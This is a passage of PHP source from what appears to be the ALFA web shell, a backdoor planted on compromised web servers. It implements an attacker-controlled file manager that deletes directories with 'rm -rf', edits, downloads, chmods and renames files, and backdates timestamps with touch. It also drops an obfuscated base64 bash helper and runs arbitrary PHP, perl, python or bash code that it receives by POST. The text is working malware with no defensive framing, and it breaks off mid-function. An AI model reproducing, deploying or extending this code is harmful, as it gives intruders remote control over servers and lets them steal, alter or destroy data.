\"\";\n\t}\n}\nbreak;\ncase 'delete':\nfunction deleteDir($path){\n$path = (substr($path,-1)=='/') ? $path:$path.'/';\n$dh = @opendir($path);\nwhile(($item = @readdir($dh)) !== false){\n$item = $path.$item;\nif((basename($item) == \"..\") || (basename($item) == \".\"))\ncontinue;\n$type = @filetype($item);\nif ($type == \"dir\")\ndeleteDir($item);\nelse\n@unlink($item);\n}\n@closedir($dh);\n@rmdir($path);\n}\nif(is_array(@$_POST['f']))\nforeach($_POST['f'] as $f){\nif($f == '..')\ncontinue;\n$f = rawurldecode($f);\nif($GLOBALS[\"glob_chdir_false\"]){\n\tif(_alfa_can_runCommand(true,true)){\n\t\talfaEx(\"rm -rf '\".addslashes($_POST['c'].'/'.$f).\"'\");\n\t}\n}else{\nalfaEx(\"rm -rf '\".addslashes($f).\"'\",false,false);\nif(@is_dir($f))\ndeleteDir($f);\nelse\n@unlink($f);\n}\n}\nif(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){\ndeleteDir(rawurldecode(@$_POST['alfa2']));\nalfaEx(\"rm -rf '\".addslashes($_POST['alfa2']).\"'\",false,false);\n}else{\n@unlink(rawurldecode(@$_POST['alfa2']));\n}\nif($GLOBALS[\"glob_chdir_false\"]){\n\t$source = rawurldecode(@$_POST['alfa2']);\n\tif($source!='..'&&!empty($source)){\n\t\tif(_alfa_can_runCommand(true,true)){\n\t\t\talfaEx(\"cd '\".trim(addslashes($_POST['c'])).\"';rm -rf '\".addslashes($source).\"'\");\n\t\t}\n\t}\n}\nif(is_array($_POST['f']))\nreturn;\nbreak;\ncase 'paste':\nif($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){\nforeach($_COOKIE['alfa_f'] as $f)\ncopy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);\n}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){\nfunction move_paste($c,$s,$d){\nif(@is_dir($c.$s)){\n@mkdir($d.$s);\n$h = @opendir($c.$s);\nwhile (($f = @readdir($h)) !== false)\nif(($f != \".\") and ($f != \"..\"))\ncopy_paste($c.$s.'/',$f, $d.$s.'/');\n}elseif(@is_file($c.$s))\n@copy($c.$s, $d.$s);\n}\nforeach($_COOKIE['alfa_f'] as $f)\n@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);\n}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){\nif(class_exists('ZipArchive')){\n$zip = new ZipArchive();\n$zipX = \"alfa_\".rand(1,1000).\".zip\";\nif($zip->open($zipX, 1)){\n@chdir($_COOKIE['alfa_c']);\nforeach($_COOKIE['alfa_f'] as $f){\nif($f == '..')continue;\nif(@is_file($_COOKIE['alfa_c'].$f))\n$zip->addFile($_COOKIE['alfa_c'].$f, $f);\nelseif(@is_dir($_COOKIE['alfa_c'].$f)){\n$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));\nforeach($iterator as $key=>$value){\n$key = str_replace('\\\\','/',realpath($key));\nif(@is_dir($key)){\nif(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;\n}else{$zip->addFile($key,$key);}}}}\n@chdir($GLOBALS['cwd']);\n$zip->close();\n__alert('>> '.$zipX.' << is created...');}}\n}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){\nif(class_exists('ZipArchive')){\n$zip = new ZipArchive();\nforeach($_COOKIE['alfa_f'] as $f) {\nif($zip->open($_COOKIE['alfa_c'].$f)){\n$zip->extractTo($_COOKIE['alfa_cwd']);\n$zip->close();}}}}\nunset($_COOKIE['alfa_f']);\nbreak;\ndefault:\nif(!empty($_POST['alfa1'])){\nif(in_array($_POST['alfa1'], array(\"copy\", \"move\", \"zip\", \"unzip\"))){\n__alfa_set_cookie('alfa_act', @$_POST['alfa1']);\n__alfa_set_cookie('alfa_f', @serialize($_POST['f']));\n__alfa_set_cookie('alfa_c', @$_POST['c']);\nreturn;\n}\n}\nbreak;\n}\n}\n$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);\nif(preg_match(\"#(.*)\\/\\.\\.#\", $_POST['c'], $res)){\n\t$path = explode('/', $res[1]);\n\tarray_pop($path);\n\t$_POST['c'] = implode('/', $path);\n}\n$cmd_dir = false;\nif($dirContent === false){\n\tif(_alfa_can_runCommand(true,true)){\n\t\t$tmp_getdir_path = @$_COOKIE[\"alfachdir_bash_path\"];\n\t\t@chdir(dirname($_SERVER[\"SCRIPT_FILENAME\"]));\n\t\tif(!isset($_COOKIE[\"alfachdir_bash\"])||@!file_exists($tmp_getdir_path.\"/alfacgiapi/getdir.alfa\")){\n\t\t\t$bash = \"jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==\";\n\t\t\t$tmp_getdir_path = alfaWriteTocgiapi(\"getdir.alfa\",$bash);\n\t\t\t__alfa_set_cookie(\"alfachdir_bash\", \"true\");\n\t\t\t__alfa_set_cookie(\"alfachdir_bash_path\", $tmp_getdir_path);\n\t\t}\n\t\t$dirContent = alfaEx(\"cd \".$tmp_getdir_path.\"/alfacgiapi;sh getdir.alfa '\".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']).\"'\");\n\t\t$dirContent = json_decode($dirContent, true);\n\t\tif(is_array($dirContent)){\n\t\t\tarray_pop($dirContent);\n\t\t\t$cmd_dir = true;\n\t\t}else{\n\t\t\t$dirContent = false;\n\t\t}\n\t}\n}\nalfahead();\nAlfaNum(8,9,10,7,6,5,4);\n$count_dirContent = @count($dirContent);\nif($count_dirContent > 300){\n\t@$_COOKIE[\"alfa_limited_files\"] = 100;\n}\n$alfa_sort_by = isset($_COOKIE[\"alfa_sort_by\"]) ? $_COOKIE[\"alfa_sort_by\"] : 'name';\n$alfa_limited_files = isset($_COOKIE[\"alfa_limited_files\"]) ? (int)$_COOKIE[\"alfa_limited_files\"] : 0;\n$alfa_files_page_number = isset($_POST[\"pagenum\"]) ? (int)$_POST[\"pagenum\"] : 1;\n$alfa_filesman_direction = isset($_COOKIE[\"alfa_filesman_direction\"]) ? $_COOKIE[\"alfa_filesman_direction\"] : 'asc';\n$files_page_count = 1;\nif($alfa_limited_files > 0){\n\t$files_page_count = ceil($count_dirContent/$alfa_limited_files);\n\tif($files_page_count > 1){\n\t\t$files_page_count++;\n\t}\n}\necho '
Filter: Sort By: Direction:  limit: Files Count: '.($count_dirContent-1).'
';\nif($dirContent == false){\necho '

!!! Access Denied !!!

';\nalfaFooter();\nreturn;\n}\nglobal $sort;\n$sort = array('name', 1);\nif(isset($_COOKIE[\"alfa_sort_by\"]) && !empty($_COOKIE[\"alfa_sort_by\"])){\n\t$sort[0] = $_COOKIE[\"alfa_sort_by\"];\n}\nif(!empty($_POST['alfa1'])) {\nif(preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['alfa1'], $match))\n$sort = array($match[1], (int)$match[2]);\n}\nif($alfa_files_page_number > ($files_page_count-1)){\n\t$alfa_files_page_number = 1;\n}\n$checkbox_rand = rand(11111, 99999);\necho \"
\";\n$dirs = $files = array();\n$n = $count_dirContent;\nif($n > $alfa_limited_files && $alfa_limited_files > 0){\n\t$n = ($alfa_limited_files * $alfa_files_page_number);\n\tif($n > $count_dirContent){\n\t\t$n = $count_dirContent;\n\t}\n}\n$i = 0;\nif($alfa_limited_files > 0 && $alfa_files_page_number > 1){\n\t$i = $alfa_limited_files * ($alfa_files_page_number - 1);\n}\n$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);\n$cmd_dir_backp = \"\";\nfor(;$i<$n;$i++){\nif($cmd_dir){\n$filename = $dirContent[$i][\"name\"];\n$file_owner = $dirContent[$i][\"owner\"];\n$file_group = $dirContent[$i][\"group\"];\n$file_modify = @date('Y-m-d H:i:s', $dirContent[$i][\"modify\"]);\n$file_perm = alfaPermsColor(array(\"class\"=>$dirContent[$i][\"permcolor\"],\"num\"=>$dirContent[$i][\"permnum\"],\"human\"=>$dirContent[$i][\"permhuman\"]),true);\n$file_size = $dirContent[$i][\"size\"];\nif(substr($dirContent[$i][\"name\"], 0 ,1) == \"/\"){\n$file_path = $dirContent[$i][\"name\"];\n$dirContent[$i][\"name\"] = \"..\";\n$filename = $dirContent[$i][\"name\"];\n}else{\n$file_path = $GLOBALS['cwd'].\"/\".$dirContent[$i][\"name\"];\n}\n}else{\n$filename = $dirContent[$i];\n$ow = function_exists(\"posix_getpwuid\")&&function_exists(\"fileowner\")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array(\"name\" => \"????\");\n$gr = function_exists(\"posix_getgrgid\")&&function_exists(\"filegroup\")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array(\"name\" => \"????\");\n$file_owner = $ow['name']?$ow['name']:(function_exists(\"fileowner\")?@fileowner($GLOBALS['cwd'].$filename):\"????\");\n$file_group = $gr['name']?$gr['name']:(function_exists(\"filegroup\")?@filegroup($GLOBALS['cwd'].$filename):\"????\");\n$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));\n$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);\n$file_size = @filesize($GLOBALS['cwd'].$filename);\n$file_path = $GLOBALS['cwd'].$filename;\n}\n$tmp = array('name' => $filename,\n'path' => $file_path,\n'modify' => $file_modify,\n'perms' => $file_perm,\n'size' => $file_size,\n'owner' => $file_owner,\n'group' => $file_group\n);\nif($filename == \"..\" && !$cmd_dir){\n\t$tmp[\"path\"] = str_replace(\"\\\\\", \"/\", realpath($file_path));\n}\nif(!$cmd_dir){\nif(@is_file($file_path)){\n$arr_mrg = array('type' => 'file');\nif(@is_link($file_path)){\n$arr_mrg[\"link\"] = readlink($tmp['path']);\n}\n$files[] = array_merge($tmp, $arr_mrg);\n}elseif(@is_link($file_path)){\n$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));\n}elseif(@is_dir($file_path)&& ($filename != \".\")){\n$dirs[] = array_merge($tmp, array('type' => 'dir'));\n}\n}else{\n\tif($dirContent[$i][\"type\"]==\"file\"){\n\t\t$files[] = array_merge($tmp, array('type' => 'file'));\n\t}else{\n\t\tif($dirContent[$i][\"name\"] != \".\"){\n\t\t\t$dirs[] = array_merge($tmp, array('type' => 'dir'));\n\t\t}\n\t}\n}\n}\n$GLOBALS['sort'] = $sort;\nfunction alfaCmp($a, $b) {\nif($GLOBALS['sort'][0] != 'size')\nreturn strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);\nelse\nreturn (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);\n}\nusort($files, \"alfaCmp\");\nusort($dirs, \"alfaCmp\");\nif(isset($_COOKIE[\"alfa_filesman_direction\"])&& !empty($_COOKIE[\"alfa_filesman_direction\"])){\n\tif($_COOKIE[\"alfa_filesman_direction\"] == 'desc'){\n\t\t$files = array_reverse($files);\n\t\t$dirs = array_reverse($dirs);\n\t}\n}\n$files = array_merge($dirs, $files);\n$l=0;\n$cc=0;\nforeach($files as $f){\n$f['name'] = htmlspecialchars($f['name']);\n$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];\n$checkbox = 'checkbox_'.$checkbox_rand.$cc;\n$raw_name = rawurlencode($f['name']);\n$icon = $GLOBALS['DB_NAME']['show_icons']?'':'';\n$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';\necho '';\n$l = $l?0:1;\n$cc++;\n}\necho \"
NameSizeModifyOwner/GroupPermissionsActions
'.$icon.''.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.\n$f['perms'].'R T'.(($f['type']=='file')?' E D':'').' X 
\n\n\n\n\n\n
\".$page_builder.\"
\";\nalfafooter();\n}\nfunction get_pagination_links($current_page, $total_pages){\n $links = \"\";\n if ($total_pages >= 1 && $current_page <= $total_pages) {\n\t\t$links .= \"<<\";\n\t\t$selected_page = \"\";\n\t\tif($current_page == 1){\n\t\t\t$selected_page = \" active-page-number\";\n\t\t}\n $links .= \"1\";\n $i = max(2, $current_page - 5);\n if ($i > 2)\n $links .= \"...\";\n for (; $i < min($current_page + 6, $total_pages); $i++) {\n\t\t\tif($i == $current_page){\n\t\t\t\t$selected_page = \" active-page-number\";\n\t\t\t}else{\n\t\t\t\t$selected_page = \"\";\n\t\t\t}\n $links .= \"{$i}\";\n }\n if ($i != $total_pages)\n $links .= \"...\";\n\t\t$selected_page = \" last-page-number\";\n\t\tif($current_page == $total_pages){\n\t\t\t$selected_page .= \" active-page-number\";\n\t\t}\n $links .= \"{$total_pages}\";\n\t\t$links .= \">>\";\n }\n return $links;\n}\nfunction alfaFilesTools(){\nalfahead();\necho '
';\nif(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);\n$alfa1_decoded = $_POST['alfa1'];\n$chdir_fals = false;\nif(!@chdir($_POST['c'])){\n\t$chdir_fals = true;\n\t$_POST['alfa1'] = $_POST[\"c\"].\"/\".$_POST[\"alfa1\"];\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\n\tif($alfa_canruncmd){\n\t\t$slashed_alfa1 = addslashes($_POST['alfa1']);\n\t\t$file_info = explode(\":\", alfaEx('stat -c \"%F:%U:%G:%s:%Y:0%a:%A\" \"'.$slashed_alfa1.'\"'));\n\t\t$perm_color_class = alfaEx(\"if [[ -w '\".$slashed_alfa1.\"' ]]; then echo main_green_perm; elif [[ -r '\".$slashed_alfa1.\"' ]]; then echo main_white_perm; else echo main_red_perm; fi\");\n\t}\n}\nif($_POST['alfa2'] == 'auto'){\nif(is_array(@getimagesize($_POST['alfa1']))){\n$_POST['alfa2'] = 'image';\n}else{\n\t$_POST['alfa2'] = 'view';\n\tif($chdir_fals){\n\t\tif($alfa_canruncmd){\n\t\t\t$mime = explode(\":\", alfaEx(\"file --mime-type '\".addslashes($_POST['alfa1']).\"'\"));\n\t\t\t$mimetype = $mime[1];\n\t\t\tif(!empty($mimetype)){\n\t\t\t\tif(strstr($mimetype, \"image\")){\n\t\t\t\t\t$_POST['alfa2'] = 'image';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n}\nif($_POST['alfa2'] == \"rename\" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}\nif(@$_POST['alfa2'] == 'mkfile'){\n$_POST['alfa1'] = trim($_POST['alfa1']);\nif($chdir_fals&&$alfa_canruncmd){\n\tif(_alfa_is_writable($_POST[\"c\"])){\n\t\talfaEx(\"cd '\".addslashes($_POST[\"c\"]).\"';touch '\".addslashes($alfa1_decoded).\"'\");\n\t\t$_POST['alfa2'] = \"edit\";\n\t}\n}\nif(!@file_exists($_POST['alfa1'])){\n$fp = @fopen($_POST['alfa1'], 'w');\nif($fp){\n$_POST['alfa2'] = \"edit\";\nfclose($fp);\n}\n}else{\n$_POST['alfa2'] = \"edit\";\n}\n}\nif(!_alfa_file_exists(@$_POST['alfa1'])){\necho __pre().\"

!...FILE DOEST NOT EXITS...!

\";\nalfaFooter();\nreturn;\n}\nif($chdir_fals){\n$filesize = $file_info[3];\n$uid[\"name\"] = $file_info[1];\n$gid[\"name\"] = $file_info[2];\n$permcolor = alfaPermsColor(array(\"class\"=>$perm_color_class,\"num\"=>$file_info[5],\"human\"=>$file_info[6]),true);\n}else{\n$uid = function_exists(\"posix_getpwuid\")&&function_exists(\"fileowner\")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';\n$gid = function_exists(\"posix_getgrgid\")&&function_exists(\"filegroup\")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';\nif(!$uid&&!$gid){\n$uid['name'] = function_exists(\"fileowner\")?@fileowner($_POST['alfa1']):'';\n$gid['name'] = function_exists(\"filegroup\")?@filegroup($_POST['alfa1']):'';\n}\n$permcolor = alfaPermsColor($_POST['alfa1']);\n$filesize = @filesize($_POST['alfa1']);\nif(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){\n\tif(_alfa_can_runCommand()){\n\t\tlist($uid['name'],$gid['name']) = explode(\":\", alfaEx('stat -c \"%U:%G\" \"'.addslashes($_POST[\"c\"].\"/\".$_POST[\"alfa1\"]).'\"'));\n\t}\n}\n}\nif(substr($_POST['alfa1'], 0, 7) == \"phar://\"){\n\t$alfa_file_directory = $_POST['alfa1'];\n}else{\n\t$alfa_file_directory = str_replace(\"//\", \"/\",($chdir_fals?\"\":$_POST['c'].'/').$_POST['alfa1']);\n}\necho '
Name: '.htmlspecialchars(basename($alfa1_decoded)).' Size: '.alfaSize($filesize).' Permission: '.$permcolor.' Owner/Group: '.$uid['name'].'/'.$gid['name'].' Directory: '.dirname($alfa_file_directory).'
';\nif(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';\nif(!_alfa_is_dir($_POST['alfa1'])){\n$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');\n$ftype = \"file\";\n}else{\n$m = array('Chmod', 'Rename', 'Touch');\n$ftype = \"dir\";\n}\necho('';\nswitch($_POST['alfa2']){\ncase 'view':case 'edit':\n@chdir($_POST['c']);\n$disabled_btn = \"\";\nif(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){\n$disabled_btn = \"disabled=disabled\";\n$disabled_btn_style= 'background: #ff0000;color: #fff;';\n}\nif(!empty($_POST['alfa3'])){\n$_POST['alfa3'] = substr($_POST['alfa3'],1);\n$time = @filemtime($_POST['alfa1']);\n$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);\nif($chdir_fals&&$alfa_canruncmd){\n\t$rname = $alfa1_decoded;\n\t$randname = $rname.rand(111,9999);\n\t$filepath = dirname($_SERVER[\"SCRIPT_FILENAME\"]).\"/\".$randname;\n\tif($fp = @__write_file($filepath ,$_POST['alfa3'])){\n\t\talfaEx(\"mv '\".addslashes($filepath).\"' '\".addslashes($_POST[\"alfa1\"]).\"';rm -f '\".addslashes($filepath).\"'\");\n\t}\n}\nif($fp){\necho 'Saved!
';\n@touch($_POST['alfa1'],$time,$time);\n}\n}\necho '
'._alfa_load_ace_options(\"editor\").' 
';\necho htmlspecialchars(__read_file($_POST['alfa1']));\necho '
';\nbreak;\ncase 'highlight':\n@chdir($_POST['c']);\nif(@is_readable($_POST['alfa1'])){\necho '
';\n$code = @highlight_file($_POST['alfa1'],true);\necho str_replace(array(''), array(''),$code).'
';\n}\nbreak;\ncase 'delete':\n@chdir($_POST['c']);\nif(@is_writable($_POST['alfa1'])||$GLOBALS[\"glob_chdir_false\"]){\n$deleted = true;\nif(!@unlink($_POST['alfa1'])){\n\t$deleted = false;\n\tif($alfa_canruncmd){\n\t\tif(_alfa_is_writable($_POST['alfa1'])){\n\t\t\talfaEx(\"rm -f '\".addslashes($_POST['alfa1']).\"'\");\n\t\t\t$deleted = true;\n\t\t}\n\t}\n}\nif($deleted)echo 'File Deleted...';else echo 'Error...';}\nbreak;\ncase 'chmod':\n@chdir($_POST['c']);\nif(!empty($_POST['alfa3'])){\n$perms = 0;\nfor($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)\n$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));\nif(!@chmod($_POST['alfa1'], $perms)){\nif($chdir_fals&&$alfa_canruncmd){\nalfaEx(\"cd '\".addslashes($_POST[\"c\"]).\"';chmod \".addslashes($_POST['alfa3']).\" '\".addslashes($alfa1_decoded).\"'\");\necho('Success!');\n}else{\necho 'Can\\'t set permissions!
';}\n}else{echo('Success!');}\n}\nclearstatcache();\nAlfaNum(8,9,10,7,6,5,4,2,1);\nif($chdir_fals){\n\t$file_perm = $file_info[5];\n}else{\n\t$file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);\n}\necho '
';\nbreak;\ncase 'hexdump':\n@chdir($_POST['c']);\n$c = __read_file($_POST['alfa1']);\n$n = 0;\n$h = array('00000000
','','');\n$len = strlen($c);\nfor ($i=0; $i<$len; ++$i) {\n$h[1] .= sprintf('%02X',ord($c[$i])).' ';\nswitch ( ord($c[$i]) ) {\ncase 0: $h[2] .= ' '; break;\ncase 9: $h[2] .= ' '; break;\ncase 10: $h[2] .= ' '; break;\ncase 13: $h[2] .= ' '; break;\ndefault: $h[2] .= $c[$i]; break;\n}\n$n++;\nif ($n == 32) {\n$n = 0;\nif ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';}\n$h[1] .= '
';\n$h[2] .= \"\\n\";\n}\n}\necho '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
';\nbreak;\ncase 'rename':\n@chdir($_POST['c']);\n$alfa1_escape = addslashes($_POST[\"alfa1\"]);\n$alfa3_escape = addslashes($_POST[\"alfa3\"]);\nif(!empty($_POST['alfa3'])){\n$cmd_rename = false;\nif($chdir_fals&&$alfa_canruncmd){\nif(_alfa_is_writable($_POST['alfa1'])){\n$alfa1_escape = addslashes($alfa1_decoded);\nalfaEx(\"cd '\".addslashes($_POST['c']).\"';mv '\".$alfa1_escape.\"' '\".addslashes($_POST['alfa3']).\"'\");\n}else{\n$cmd_rename = true;\n}\n}else{\n$alfa1_escape = addslashes($_POST[\"alfa1\"]);\n}\nif(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){\necho 'Can\\'t rename!
';}else{echo('Renamed!');$alfa1_escape = $alfa3_escape;}\n}\necho '
';\nbreak;\ncase 'touch':\n@chdir($_POST['c']);\nif( !empty($_POST['alfa3']) ) {\n$time = strtotime($_POST['alfa3']);\nif($time){\n$touched = false;\nif($chdir_fals&&$alfa_canruncmd){\n\talfaEx(\"cd '\".addslashes($_POST[\"c\"]).\"';touch -d '\".htmlspecialchars(addslashes($_POST['alfa3'])).\"' '\".addslashes($alfa1_decoded).\"'\");\n\t$touched = true;\n}\nif(!@touch($_POST['alfa1'],$time,$time)&&!$touched)\necho 'Fail!';\nelse\necho 'Touched!';\n} else echo 'Bad time format!';\n}\nclearstatcache();\necho '
';\nbreak;\ncase 'image':\n@chdir($_POST['c']);\necho('
');\n$file = $_POST['alfa1'];\n$image_info = @getimagesize($file);\nif(is_array($image_info)||$chdir_fals){\n$width = (int)$image_info[0];\n$height = (int)$image_info[1];\nif($chdir_fals&&$alfa_canruncmd){\n\t$source = alfaEx(\"cat '\".addslashes($file).\"' | base64\");\n\tlist($width, $height) = explode(\":\", alfaEx(\"identify -format '%w:%h' '\".addslashes($file).\"'\"));\n\t$mime = explode(\":\", alfaEx(\"file --mime-type '\".addslashes($file).\"'\"));\n\t$image_info['mime'] = $mime[1];\n}else{\n\t$source = __ZW5jb2Rlcg(__read_file($file, false));\n}\n$image_info_h = \"Image type = [ \".$image_info['mime'].\" ]
Image Size = [ \".$width.\" x \".$height.\" ]
\";\nif($width > 800){$width = 800;}\necho $content = \"
\".$image_info_h.\"
\".$file.\"

\";\n}\nbreak;\n}\necho '
';\nalfaFooter();\n}\nfunction findicon($file,$type){\n$s = 'http://solevisible.com/icons/';\n$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');\nif($type!='file'){\nreturn ($file=='..'?$s.'back.png':$s.'folder.png');\n}else{\n$ext = explode('.',$file);\n$ext = end($ext);\n$ext = strtolower($ext);\nreturn (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');\n}\n}\nfunction alfadlfile(){\nif(isset($_POST['c'],$_POST['file'])){\n$basename = rawurldecode(basename($_POST['file']));\n$_POST['file'] = str_replace(\"//\", \"/\", $_POST['c'].'/'.$basename);\n$alfa_canruncmd = _alfa_can_runCommand(true,true);\nif(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){\nob_start(\"ob_gzhandler\", 4096);\nheader(\"Content-Disposition: attachment; filename=\\\"\".addslashes($basename).\"\\\"\");\nheader(\"Content-Type: application/octet-stream\");\nif($GLOBALS[\"glob_chdir_false\"]){\n\t$randname = $basename.rand(111,9999);\n\t$scriptpath = dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n\t$filepath = $scriptpath.\"/\".$randname;\n\tif(_alfa_is_writable($scriptpath)){\n\t\talfaEx(\"cp '\".addslashes($_POST[\"file\"]).\"' '\".addslashes($filepath).\"'\");\n\t\treadfile($filepath);\n\t\t@unlink($filepath);\n\t}else{\n\t\talfaEx(\"cat '\".addslashes($_POST[\"file\"]).\"'\");\n\t}\n}else{\n\treadfile($_POST['file']);\n}\n}else echo('Error...!');}}\nfunction __alfa_set_cookie($key, $value){\n\t$_COOKIE[$key] = $value;\n\t@setcookie($key, $value, time()+(86400 * 7), '/');\n}\nfunction alfaphpeval(){\nif(isset($_COOKIE[\"eval_tmpdir\"])&&@is_dir($_COOKIE[\"eval_tmpdir\"])){\n\t$tempdir = __ZGVjb2Rlcg($_COOKIE[\"eval_tmpdir\"]);\n}else{\n\t$tempdir = dirname(alfaEx(\"mktemp\"));\n\t__alfa_set_cookie(\"eval_tmpdir\", __ZW5jb2Rlcg($tempdir));\n}\nalfahead();\nif(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){\necho '
';\nob_start();\n$INI=ini_get_all();\nprint ''\n.''\n.''\n.''\n.'';\nforeach ($INI as $param => $values)\nprint \"\\n\".''\n.''\n.''\n.''\n.'';\n$tmp = ob_get_clean();\n$tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);\n$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);\necho str_replace('
';\n}\nif(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {\necho '
';\nob_start();\nphpinfo();\n$tmp = ob_get_clean();\n$tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);\n$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);\necho str_replace('
';\n}\nif(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {\necho '
';\nob_start();\n$EXT=get_loaded_extensions();\necho '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].'
'.\"\\n\".'
'.implode('
', $EXT).'
'.count($EXT).' extensions loaded';\necho '

';\n}\n$lang_html = \"\";\nforeach(array(\"php\"=>\"php ~> [ Windows / Linux ]\",\"perl\"=>\"perl ~> [ Linux ]\",\"python\"=>\"python ~> [ Linux ]\",\"bash\"=>\"bash ~> [ Linux ]\") as $key=>$val){$lang_html .= '';}\necho '
| INI_INFO | | phpinfo | | extensions |

Select Language:
'._alfa_load_ace_options(\"eval\").'

'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):\"<?php\\n\\n\\techo('hello alfa !');\\n\\n?>\").'
';\necho '
';\nif(!empty($_POST['alfa1'])){\nif($_POST['alfa3']==\"php\"){\nob_start();\neval('?>'.$_POST['alfa1']);\n$result = htmlspecialchars(ob_get_clean());\n}elseif(_alfa_can_runCommand()&&$GLOBALS[\"sys\"]==\"unix\"){\n\t$lang = $_POST['alfa3'];\n\t$filename = \"temp\".rand(11111,99999);\n\t$temp = $tempdir.\"/\".$filename ;\n\t__write_file($filename, $_POST['alfa1']);\n\t$result = alfaEx(\"mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}\");\n\t@unlink($filename);\n\t@unlink($temp);\n}\necho '';\n}\necho '
